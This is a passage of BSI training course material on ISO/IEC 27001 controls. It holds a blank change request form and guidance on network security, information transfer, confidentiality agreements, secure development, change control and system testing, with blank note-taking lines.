Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
ABC Organization Ltd Change Request Form
General information
Change request number:
Requester name
Date
Office
Contact
Desk phone
Mobile number
Email address
Change request definition
Description – Describe the proposed change
Justification – Justify why the proposed changes should be implemented
Impact of not implementing – Explain the impact if the proposed change is not implemented
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
80
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
Change request impact evaluation:
Check one
High
Medium
Impact description – Describe the impact and justify your choice
Low
Change request priority:
Check one
1
2
3
Emergency
Priority justification (describe why you have chosen the priority indicated above)
Change rollback plan – Describe the rollback process in case of change failure
Change test plan – Describe the testing process
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
81
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
Change request approval
Name (identify change request approvers)
Recommendation
Approve
Reject
Approve
Reject
Approve
Reject
Approve
Reject
Key:
Impact levels
High – Any change that has a high degree of probability of affecting a significant number of users
or which means that the availability of a key system is affected for significant period of time.
Medium – Any change that has the probability of affecting several users or which means that the
availability of a system is affected for a long period of time.
Low – Any change that will only affect a single user or a small number of users or which means
that the availability of a system is affected for a short period of time.
Priority levels
1 – The change is required to take place within 7 days
2 – The change is required to take place within 14 days
3 – The change is required to take place within 30 days
Emergency – The change has already been completed to resolve a security incident or severe
business issue and this form is being completed retrospectively.
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
82
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
13.1 Network security management
Objective: To ensure the protection of information in networks and its supporting information
processing facilities.
13.1.1 Network controls
Networks should be managed and controlled to protect information in systems and applications.
The purpose of network security, quite simply, is to protect the network and its component parts
from unauthorized access and misuse. Networks are vulnerable because of their inherent
characteristic of facilitating remote access. It is vital that any network, regardless of its size or type, is
managed and controlled to protect information in systems and applications.
When defining a network security policy, organizations should ensure that clear responsibilities are
established for the management of networking equipment and segregated from responsibilities for
computer operations where appropriate (6.1.2) to reduce insider threats.
Consideration should be given to the documented operating procedures required to manage networks
and ensure that controls are consistently applied across the information processing infrastructure, as
well as logging and monitoring required to enable recording and detection of actions that may affect,
or indicate breach or compromise.
Key network security requirements include:
• Restricting systems connection, thereby preventing unauthorized access
• Safeguarding the confidentiality and integrity of data passing over public networks or over wireless
networks and to protect the connected systems and applications (see Clause 10 and 13.2)
• Maintaining the availability of the network services and computers connected
• Authenticating systems on the network
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
83
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
Additional information on network security can be found in ISO/IEC 27033.[15][16][17][18][19]
13.1.2 Security of network services
Security mechanisms, service levels and management requirements of all network services should be
identified and included in network services agreements, whether these services are provided in-house
or outsourced.
Network services include the provision of connections, private network services, value added
networks and managed network security solutions such as firewalls, intrusion prevention systems
(IPS) and intrusion detection systems (IDS). These services can range from simple unmanaged
bandwidth to complex value-added offerings and can be managed or provided in-house or
outsourced, or a combination of both.
The security arrangements necessary for particular services, such as security features, service levels
and management requirements, should be identified.
The ability of all network service providers to manage agreed services in a secure way should be
included within network service agreements (including details of required security mechanisms and
service levels) and regularly monitored, and the right to audit should be agreed and the organization
should determine appropriate means of ensuring that network service providers implement these
measures as required.
Security features of network services could be:
• Technology applied for security of network services, such as authentication, encryption and
network connection controls
• Technical parameters required for secured connection with the network services in accordance
with the security and network connection rules
• Procedures for the network service usage to restrict access to network services or applications,
where necessary
13.1.3 Segregation in networks
Groups of information services, users and information systems should be segregated on networks.
Segregating access to systems, groups of information services, user groups and information assets is
necessary in order to limit and contain threat exposure and to apply targeted controls, avoiding
blanket application of over onerous or potentially costly controls in areas where they are not
required.
One method of managing the security of large networks is to divide them into separate network
domains. The domains can be chosen based on trust levels (e.g. public access domain, desktop
domain, server domain), along organizational units (e.g. human resources, finance, marketing) or
some combination (e.g. server domain connecting to multiple organizational units). The segregation
can be conducted using either physically different networks or by using different logical networks
(e.g. virtual private networking).
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
84
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
The perimeter of each domain should be well defined. Access between network domains is allowed,
but should be controlled at the perimeter using a gateway (e.g. firewall, filtering router). The criteria
for segregation of networks into domains, and the access allowed through the gateways, should be
based on an assessment of the security risks and requirements of each domain. The assessment
should be in accordance with the access control policy (see 9.1.1), access requirements, value and
classification of information processed and also take account of the relative cost and performance
impact of incorporating suitable gateway technology.
Due to their nature, wireless networks require special treatment. For sensitive environments,
consideration should be made to treat all wireless access as external connections and to segregate
this access from internal networks until the access has passed through a gateway in accordance with
network controls policy (see 13.1.1) before granting access to internal systems. The authentication,
encryption and user level network access control technologies of standards based wireless networks
may, however, be sufficient for direct connection to the organization’s internal network when
properly implemented.
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
85
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
13.2 Information transfer
Objective: To maintain the security of information transferred within an organization and with any
external entity.
13.2.1 Information transfer policies and procedures
Formal transfer policies, procedures and controls should be in place to protect the transfer of
information through the use of all types of communication facilities.
Ensuring that appropriate agreements and control measures are implemented to protect information
are vital before transferring information to third parties; from the security of the transfer method
itself, to how access to the information will be controlled and how it will be handled and otherwise
protected by the third party. Formal transfer policies (and supporting guidelines) outlining acceptable
use of communication facilities, responsibilities not to compromise the organization and to take
appropriate precautions not to reveal confidential information, transfer procedures and sharing
controls should be implemented to protect the transfer of information through the use of all types of
communication facilities. The business, legal and security implications associated with all electronic
data transfers (including electronic data interchange, electronic commerce and electronic
communications) should be considered.
The procedures and controls to be followed when using communication facilities for information
transfer should consider the following:
• Risk assessment of information transfer methods (particularly if using third party or cloud based
services)
• Controls needed to protect information from interception, copying, modification, misrouting and
destruction
• Detection of and protection against malware that may be transmitted through the use of electronic
communications (see 12.2.1)
• Protection of sensitive electronic information (particularly in the form of attachments)
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
86
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
• Use of cryptographic techniques e.g. to protect the confidentiality, integrity and authenticity of
information (see Clause 10)
• Retention and disposal provisions in accordance with relevant national and local legislation and
regulations
• Controls and restrictions associated with using communication facilities, e.g. automatic forwarding
of electronic mail to external mail addresses
13.2.2 Agreements on information transfer
Agreements should address the secure transfer of business information between the organization and
external parties.
Agreements should be implemented with all third parties with whom information is transferred to
ensure secure information transfer, handling and protection requirements are implemented by the
organization and the third party. Where personal data is shared or transferred with third parties, data
controller and processor responsibilities and associated required control measures must be defined in
accordance with local data protection laws (see 18.1.4).
The information security content of any agreement should reflect the sensitivity of the business
information involved.
Information transfer agreements should incorporate the following:
• Management responsibilities for controlling and notifying transmission, dispatch and receipt
• Procedures to ensure traceability and non-repudiation
• Minimum technical standards for packaging and transmission
• Escrow agreements, where applicable
• Courier identification standards
• Responsibilities and liabilities in the event of information security incidents, such as loss of data
• Use of an agreed labelling system for sensitive or critical information, ensuring that the meaning of
the labels is immediately understood and that the information is appropriately protected (see 8.2)
• Technical standards for recording and reading information and software
• Any special controls that are required to protect sensitive items, such as cryptography (see Clause
10)
• Maintaining a chain of custody for information while in transit
• Acceptable levels of (and if necessary processes for) access control
13.2.3 Electronic messaging
Information involved in electronic messaging should be appropriately protected
There are many types of electronic messaging such as email, electronic data interchange and social
networking which play a role in business communications. Unprotected (unencrypted) email and
other forms of instant electronic messaging are not secure forms of communication and may be
intercepted. It is not possible to guarantee that only the intended recipient will
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
87
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
read an electronic message. Multiple copies of email messages will be copied onto different systems which
are accessible to different people. It may not be possible to fully remove email messages from systems,
even if required. For all of these reasons, it is therefore vital, that organizations establish appropriate
internal policies and controls and agreements with third parties relating to the use of electronic messaging.
Electronic messaging policy provisions are typically included within IT, Acceptable Use and/or Information
Classification, Handling and Protection Policies.
Information security considerations for electronic messaging should include:
• Protecting messages from unauthorized access, modification or denial of service commensurate with
the classification scheme adopted by the organization
• Ensuring correct addressing and transportation of the message
• Reliability and availability of the service
• Legal considerations, for example requirements for electronic signatures
• Obtaining approval prior to using external public services such as instant messaging, social networking
or file sharing
• Stronger levels of authentication controlling access from publicly accessible networks
13.2.4 Confidentiality or non-disclosure agreements
Requirements for confidentiality or non-disclosure agreements reflecting the organization’s needs for the
protection of information should be identified, regularly reviewed and documented.
Based on the confidentiality of information to be disclosed or shared, appropriate confidentiality/nondisclosure and acceptable information handling and protection provisions should be agreed prior to
releasing information to external parties or to employees of the organization. Confidentiality or nondisclosure agreements should address the requirement to protect confidential information using legally
enforceable terms.
To identify requirements for confidentiality or non-disclosure agreements, the following elements should
be considered:
• Definition of the information to be protected (e.g. confidential information)
• Expected duration of an agreement, including cases where confidentiality might need to be maintained
indefinitely
• Required actions when an agreement is terminated
• Responsibilities and actions of signatories to avoid unauthorized information disclosure
• Ownership of information, trade secrets and intellectual property, and how this relates to the protection
of confidential information
• Permitted use of confidential information and rights of the signatory to use information
• The right to audit and monitor activities that involve confidential information
• Process for notification and reporting of unauthorized disclosure or confidential information leakage
• Terms for information to be returned or destroyed at agreement cessation
• Expected actions to be taken in case of a breach of the agreement
Requirements for confidentiality and non-disclosure agreements should be reviewed periodically and when
changes occur that influence these requirements.
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
88
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
14.1 System acquisition, development and maintenance
Objective: To ensure that information security is an integral part of information systems across the
entire lifecycle. This also includes the requirements for information systems which provide services
over public networks.
In acquiring new information systems or making enhancements to existing information systems and
delivering business benefits, care needs to be taken to ensure that:
• Security vulnerabilities are not introduced
• Confidentiality, integrity and availability of information assets processed and stored within systems
are not compromised
• Information security is an integral part of information systems across their entire lifecycle
14.1.1 Information security requirements analysis and specification
The information security related requirements should be included in the requirements for new
information systems or enhancements to existing information systems.
The requirements or specifications for new systems or enhancements need to be clearly defined,
including information security requirements. Requirements can be derived from a variety of sources
including compliance requirements from policies and regulations, threat modelling, incident reviews,
or using vulnerability thresholds. Results of the identification of requirements should be documented
and reviewed by all stakeholders.
Information security requirements and controls should reflect the business value of the information
involved (see 8.2) and the potential negative business impact which might result from lack of
adequate security.
Identification and management of information security requirements and associated processes should
be integrated in early stages of information systems projects. Early consideration of information
security requirements, e.g. at the design stage can lead to more effective and cost efficient solutions.
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
89
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
Specific information security requirements may include:
• Level of user security expectations including authentication, privacy and data protection
• The required confidentiality, integrity and availability protection needs of the information assets
involved
• Access provisioning and authorization processes, for business/general users as well as for
privileged or technical users
• Means of informing users and operators of their duties and responsibilities
• Requirements derived from business processes, such as activity or transaction logging and
monitoring or requirements to prevent repudiation of commitments
• Requirements mandated by other security controls, e.g. interfaces to logging and monitoring or
data loss prevention (DLP) systems
• Where applicable, controls to protect information, services and transactions passing over public
networks (see 14.1.2 and 14.1.3)
If products are acquired, a formal testing and acquisition process should be followed. Contracts with
the supplier should address the identified security requirements. Acquisition and development risks
should be assessed and addressed. Where the security functionality in a proposed product does not
satisfy the specified requirement, the risk introduced and associated controls should be reconsidered
prior to purchasing the product.
Available guidance for security configuration of the product aligned with the final software/ service
stack of that system should be evaluated and implemented.
Criteria for testing and accepting products should be defined in terms of their functionality and
effectiveness of security controls. Products should be tested and/or evaluated against these criteria
before acquisition or operation.
14.1.2 Securing application services on public networks
Information involved in application services passing over public networks should be protected from
fraudulent activity, contract dispute and unauthorized disclosure and modification.
Applications accessible via public networks are subject to a range of network related threats, such as
fraudulent activities including data modification, contract disputes or disclosure of information to the
public. Therefore, detailed risk assessments and proper selection of controls are indispensable.
Where application services pass over public networks, organizations should:
• Consider what degree of assurance each party needs that each other’s claimed identity is real and
then build controls into the solution to provide that assurance. This can be done through the use
of various authentication methods. The lower the degree of assurance required to simpler the
methodology, e.g. the use of passwords. The greater the degree of assurance required, then
multi-factor authentication should be considered
• Processes should be established to ensure that key transactional documents can only be approved,
signed or issued by specific individuals or roles. When these roles are established, each party
should be informed of the levels of authorization they have for the use of the service
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
90
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
• A number of key documents may be required for a transactional relationship between two entities to
exist, such as contracts, service level agreements and codes of connection. These documents may
contain sensitive information and should be protected to ensure their confidentiality, integrity and
availability. Associated with this are specific controls, especially in terms of communication of the
documents and the integrity of their content, e.g. proof of dispatch and non-repudiation controls such as
digital signatures (see Clause 10 for the use of cryptography and Clause 18 which talks about the legal
aspects of using cryptography which will be different in different jurisdictions). Again, the greater the
degree of assurance required that a document has been sent or has not been tampered with, then the
greater number or strength of controls that need to be implemented
• In order for an organization to fulfil its obligations to provide reliable products and services over the
internet a number of pieces of specific information may need to be acquired and utilized, e.g. order
information, payment information, delivery address details and so on. Consequently, assurance needs to
be maintained that the information acquired and in use is correct and up to date. Therefore controls
should be built into any system to guard against error and to detect unauthorized alterations
• The organization should also consider to what extent it requires accurate information associated with
payments. Again, a degree of assurance should be determined, maybe based on value of the transaction
or timeliness of the transaction. Once determined, this degree of assurance should be met by the
implementation of verification checks within the system
• Many people are still reluctant to trust online transactions due to the levels of fraud that may exist within
different systems and in general on the internet. Internet based fraud is also a problem for the vendor in
that many goods and services are supplied without the need for name and address verification which can
act as a form of anti-fraud control. Consequently the form of payment required by the organization
should be carefully considered to ensure that fraudulent activity cannot take place and for the customer
to have confidence that their payment information will not be misused. If intending to take payments via
credit card or debit card then other obligations need to be considered such as the need to comply with
the Payment Card Industry Data Security Standard (PCI DSS). Associated with these obligations is the
need to evaluate the liability of any fraudulent activity that does take place (compliance with PCI DSS will
help to reduce this liability)
• Once transaction information has been received then care should be taken to ensure that the customer
(or any other malicious entity) cannot duplicate the transaction whilst also avoiding a second payment.
Similarly, measures should be taken to ensure that the payment is not processed twice. Also, controls
should exist within the system to ensure that once acquired, transaction information is not lost as it will
be required for non-repudiation purposes in the event of a dispute
Any service arrangement that is put into place between two parties should be formally agreed between the
two through the use of documented agreements.
A significant number of the considerations above are related mainly to the confidentiality and integrity
aspects of information security, but depending upon the service being provided, availability may be equally
important and so this should be assessed and suitable controls put in place to ensure that availability is
maintained through the use of highly resilient network connections and specific safeguards against denial of
service attacks against servers etc.
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
91
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
14.1.3 Protecting application services transactions
Information involved in application service transactions should be protected to prevent incomplete
transmission, mis-routing, unauthorized message alteration, unauthorized disclosure, unauthorized
message duplication or replay.
Services provided over the internet inevitably involve the exchange of transactional information
between two or more parties. If not protected, this information could be the cause of unwanted
outcomes, e.g. fraud. There are a number of specific controls that should be considered for
implementation within any transactional system including:
• The use, by each party involved in the transaction of electronic signatures to provide assurance
that information that is to be relied upon for the service to be provided has not been altered in any
way by unauthorized parties
• The protection of the secret authentication information (e.g. passwords) of the parties involved in
the transaction both from an integrity point of view to ensure that the information can be relied
upon but also from a confidentiality point of view to protect against unauthorized access
• The confidentiality of the transaction itself, depending upon its nature through the use of
encrypted communications paths and protection of the protocols used to provide communication
between all parties involved and the privacy of all parties concerned, especially in light of changes
in many jurisdictions around the world to legislation associated with the protection of personally
identifiable information (see clause 18) (e.g. General Data Protection Regulations (GDPR) in
Europe)
• Controls to ensure that transactional information can be easily obtained, such as ensuring that
such information is stored at an internal network location and not on systems that are easily
accessed from the internet
• The use of public key infrastructure to ensure the validity of certificates used in transactional
systems. The information associated with the use of digital certificates should also be protected at
all times as should the communication paths between the organization and the Certificate
Authority (CA)
Careful consideration needs to be given to transactions that take place across borders as different
legal and regulatory requirements are likely to exist depending upon the jurisdiction, associated with
where the transaction is generated from, processed via, completed at or stored in.
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
………………………………………………………………………
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
92
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
14.2 Security in development and support processes
Objective: To ensure that information security is designed and implemented within the development
lifecycle of information systems.
14.2.1 Secure development policy
Rules for the development of software and systems should be established and applied to
developments within the organization.
As with the acquisition of new systems (see 14.1.1), organizations need to establish their rules for
the development of software and systems to be applied to developments within their organizations or
to outsourced development; ensuring that information security is designed and implemented within
the full lifecycle of information systems. Secure development is a requirement to build up a secure
service, architecture, software and system.
Within a secure development policy, the following aspects should be considered:
• Establishing security requirements for development environments
• Assigning responsibilities or accessing appropriate resources to give guidance on security in the
software development lifecycle and/or defining required application security knowledge
• Integrating security in the software development methodology and setting checkpoints to ensure
that security requirements are being met
• Establishing security requirements in the design phase
• Establishing secure coding standards (for or applicable to each programming language used)
• Securing code repositories
• Applying security in the version control
• Ensuring developers’ capability of avoiding, finding and fixing vulnerabilities
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
93
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
Secure programming techniques should be used both for new developments and in code re-use
scenarios where the standards applied to development may not be known or are not consistent with
current best practices.
Developers should be trained in their use and testing and code review should verify their use. If
development is outsourced, the organization should obtain assurance that the external party complies
with these rules for secure development (see 14.2.7).
14.2.2 System change control procedures
Changes to systems within the development lifecycle should be controlled by the use of formal
change control procedures.
As seen within 12.1.2, without effective change management, vulnerabilities can be introduced and
operational functionality broken. Making software changes can impact the operational environment
and vice versa.
Formal system change control procedures should be documented and enforced to ensure the
integrity of system, applications and products, from the early design stages through all subsequent
maintenance efforts. Introduction of new systems and major changes to existing systems should
follow a formal process of documentation, specification, testing, quality control and managed
implementation.
This process should include a risk assessment, analysis of the impacts of changes and specification of
security controls needed. This process should also ensure that existing security and control
procedures are not compromised, that support programmers are given access only to those parts of
the system necessary for their work and that formal agreement and approval for any change is
obtained.
Wherever practicable, application and operational change control procedures should be integrated
(see 12.1.2). In addition to the general provisions made within operational change procedures within
12.1.2, system change control procedures should also include provisions for:
• Maintaining a record of agreed authorization levels
• Ensuring changes are submitted by authorized users
• Reviewing security controls and integrity procedures to ensure that they will not be compromised
by the changes
• Identifying all software, information, database entities and hardware that require amendment
• Obtaining formal approval for detailed proposals before work commences and scheduling work to
avoid or minimize any disruption to the business processes involved
• Identifying and checking security critical code to minimize the likelihood of known security
weaknesses
• Ensuring authorized users accept changes prior to implementation
• Maintaining version control for all software updates and an audit trail of all change requests
• Ensuring that the system and operating documentation set is updated on the completion of each
change and that old documentation is archived or disposed of
• Testing in a segregated environment
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
94
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
Where automatic updates are considered, the risk to the integrity and availability of the system
should be weighed against the benefit of speedy deployment of updates. Automated updates should
not be used on critical systems as some updates can cause critical applications to fail.
14.2.3 Technical review of applications after operating platform changes
When operating platforms are changed, business critical applications should be reviewed and tested
to ensure there is no adverse impact on organizational operations or security
When operating platforms are changed, business critical applications should be reviewed and/or
tested to ensure there is no adverse impact on organizational operations or security. Operating
platforms include operating systems, databases and middleware platforms. The control should also
be applied for changes of applications.
It is imperative that organizations communicate notifications of operating platform changes in a
timely manner to allow sufficient time to plan for adequate reviews/tests.
Reviews should include functionality of application controls and integrity procedures, to ensure that
they have not been compromised by the operating platform changes. The organization should also
ensure that changes are reflected within business continuity plans as necessary.
14.2.4 Restrictions on changes to software packages
Modifications to software packages should be discouraged, limited to necessary changes and all
changes should be strictly controlled.
Just as restriction and control is needed over the installation of operational software (see 12.6.2),
modifications to software packages should be discouraged, limited to necessary changes and all
changes should be strictly controlled.
As far as possible and practicable, vendor-supplied software packages should be used without
modification. Where a software package needs to be modified the risk of built-in controls and
integrity processes being compromised needs to be considered. The organization should establish
whether the consent of the vendor should be obtained and whether the required changes can be
obtained from the vendor as standard program updates. Future maintenance impacts and
compatibility with other software in use also need to be considered.
If changes are necessary, the original software should be retained and the changes applied to a
designated copy. A software update management process should be implemented to ensure the most
up-to-date approved patches and application updates are installed for all authorized software (see
12.6.1). All changes should be fully tested and documented, so that they can be reapplied, if
necessary, to future software upgrades. If required, the modifications should be tested and validated
by an independent evaluation body.
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
95
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
14.2.5 Secure system engineering principles
Principles for engineering secure systems should be established, documented, maintained and applied
to any information system implementation efforts.
Secure information system engineering procedures based on security engineering principles should be
established, documented and applied to in-house information system engineering activities. These may
be based on principles established within the security industry (e.g. NIST 800-27 Rev A), on coding
language specific principles, vendor recommendations and guidelines or can be developed by the
organization itself.
Security should be designed into all architecture layers (business, data, applications and technology)
balancing the need for information security with the need for accessibility. New technology should be
analysed for security risks and the design should be reviewed against known attack patterns.
These principles and the established engineering procedures should be regularly reviewed to ensure
that they are effectively contributing to enhanced standards of security within the engineering process.
They should also be regularly reviewed to ensure that they remain up-to-date in terms of combating
any new potential threats and in remaining applicable to advances in the technologies and solutions
being applied.
The established security engineering principles should be applied, where applicable, to outsourced
information systems through the contracts and other binding agreements between the organization and
the supplier to whom the organization outsources. The organization should confirm that the rigour of
suppliers’ security engineering principles is comparable with its own.
Application development procedures should apply secure engineering techniques in the development of
applications that have input and output interfaces. Secure engineering techniques provide guidance on
user authentication techniques, secure session control and data validation, sanitization and elimination
of debugging codes.
14.2.6 Secure development environment
Organizations should establish and appropriately protect secure development environments for system
development and integration efforts that cover the entire system development lifecycle.
The security and appropriate segregation of development and integration environments is vital to
protect the integrity and availability of live environments and ensure that vulnerabilities are not
introduced that could compromise confidentiality.
A secure development environment includes people, processes and technology associated with system
development and integration.
Organizations should assess risks associated with individual system development efforts and establish
secure development environments for specific system development efforts.
Measures required to secure and segregate development environments depend on a variety of factors:
the sensitivity of data to be processed, stored and transmitted by the system, the applicability of
external and internal requirements, controls already in place, the experience and trustworthiness of
personnel working in the environment (see 7.1.1), the degree of outsourcing associated with system
development or access required to it and control over movement of data from and to the environment.
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
96
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
Additional considerations should be taken in relation to the requirements for monitoring of change to
the environment and code stored therein and backup provisions (including secure offsite storage).
Once the level of protection is determined for a specific development environment, organizations
should document corresponding processes in secure development procedures and provide these to all
individuals who need them.
14.2.7 Outsourced development
The organization should supervise and monitor the activity of outsourced system development.
Organizations choosing to outsource development are able to outsource development activities but
cannot absolve themselves of the risks associated with them and remain responsible for compliance
with applicable laws and control efficiency verification.
Organizations should ensure they have their own development policy requirements to direct
outsourced development and should supervise and monitor the activity of outsourced system
development. In addition to supply relationship controls (see 15) the following considerations should
be taken in relation to outsourcing development activities:
• Licensing arrangements, code ownership and intellectual property rights related to the outsourced
content (see 18.1.2)
• Contractual requirements for secure design, coding and testing practices (see 14.2.1)
• Provision of the approved threat model to the external developer
• Acceptance testing for the quality and accuracy of the deliverables
• Provision of evidence that security thresholds were used to establish minimum acceptable levels of
security and privacy quality
• Provision of evidence that sufficient testing has been applied to guard against the absence of both
intentional and unintentional malicious content upon delivery and the presence of known
vulnerabilities
• Escrow arrangements, e.g. if source code is no longer available
• The contractual right to audit development processes and controls
• Requirements for the provision of effective documentation of the build environment used to create
deliverables.
14.2.8 System security testing
Testing of security functionality should be carried out during development.
New and updated systems require thorough security testing and verification during the development
processes, including the preparation of a detailed schedule of activities and test inputs and expected
outputs under a range of conditions. For in-house developments, such tests should initially be
performed by the development team. Independent acceptance testing should then be undertaken
(both for in-house and for outsourced developments) to ensure that the system works as expected
and only as expected (see 14.1.1 and 14.1.9). The extent of testing should be in proportion to the
importance and nature of the system.
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
97
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
14.2.9 System acceptance testing
Acceptance testing programs and related criteria should be established for new information systems,
upgrades and new versions.
System acceptance testing should include testing of information security requirements and adherence
to secure system development practices. The testing should also be conducted on received
components and integrated systems. Organizations can leverage automated tools, such as code
analysis tools or vulnerability scanners, and should verify the remediation of security related defects.
Testing should be performed in a realistic test environment to ensure that the system will not
introduce vulnerabilities to the organization’s environment and that the tests are reliable.
…………………………………………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………
…………………………………………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………………
